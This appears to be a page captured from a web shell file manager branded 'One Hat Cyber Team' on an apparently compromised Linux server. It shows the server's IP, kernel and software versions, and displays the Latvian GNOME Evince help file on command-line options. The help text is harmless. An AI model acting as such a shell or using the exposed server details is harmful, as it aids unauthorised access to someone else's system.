One Hat Cyber Team
Your IP :
216.73.216.50
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
help
/
lv
/
evince
/
View File Name :
commandline.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" style="task" id="commandline" xml:lang="lv"> <info> <link type="guide" xref="index#advanced"/> <title type="sort">Komandrinda</title> <desc>Komanda <cmd>evince</cmd> var atvērt jebkādu daudzumu datņu, noteiktās lappusēs un dažādos veidos.</desc> <revision pkgversion="3.2" version="0.1" date="2011-09-05" status="final"/> <revision pkgversion="3.24" version="0.2" date="2017-09-17" status="final"/> <credit type="author"> <name>Phil Bull</name> <email>philbull@gmail.com</email> </credit> <credit type="editor"> <name>Tiffany Antopolski</name> <email>tiffany@antopolski.com</email> </credit> <license> <p>Creative Commons Share Alike 3.0 licence</p> </license> <mal:credit xmlns:mal="http://projectmallard.org/1.0/" type="translator copyright"> <mal:name>Viesturs Ružāns</mal:name> <mal:email>viesty@exs.lv</mal:email> <mal:years>2011</mal:years> </mal:credit> <mal:credit xmlns:mal="http://projectmallard.org/1.0/" type="translator copyright"> <mal:name>Rūdolfs Mazurs</mal:name> <mal:email>rudolfs.mazurs@gmail.com</mal:email> <mal:years>2012, 2013</mal:years> </mal:credit> </info> <title>Komandrinda</title> <p>Lai palaistu <app>dokumentu skatītāju</app> no komandrindas, ierakstiet <cmd>evince</cmd>. Noteiktu datni var atvērt, ierakstot datnes nosaukumu pēc evince komandas:</p> <screen>evince datne.pdf</screen> <p>Varat atvērt vairākas datnes, atdalot to nosaukums ar atstarpēm pēc evince komandas:</p> <screen>evince datne1.pdf datne2.pdf</screen> <p><app>Dokumentu skatītāja</app> lietotne atbalsta tīmekļa datņu pārvaldību. Piemēram, pēc evince komandas varat sniegt datnes atrašanās vietu tīmeklī:</p> <screen>evince http://www.claymath.org/millennium/P_vs_NP/pvsnp.pdf</screen> <section id="open"> <title>Dokumenta atvēršana noteiktā lappusē</title> <p>Varat izmantot <cmd>--page-label</cmd> slēdzi, lai atvēru dokumentu no noteiktas lappuses. Piemēram, lai atvērtu dokumentu no 3, lappuses, būtu jāraksta:</p> <screen>evince --page-label=3 datne.pdf</screen> <p> The page label should be in the same format as the page number displayed in the <app>Document Viewer</app> header bar. </p> </section> <section id="fullsreen"> <title>Dokumenta atvēršana pilnekrāna režīmā</title> <screen>evince --fullscreen datne.pdf</screen> </section> <section id="presentation"> <title>Dokumenta atvēršana prezentācijas režīmā</title> <screen>evince --presentation datne.pdf</screen> </section> <section id="preview"> <title>Dokumenta atvēršana priekšskatījuma režīmā</title> <screen>evince --preview datne.pdf</screen> </section> </page>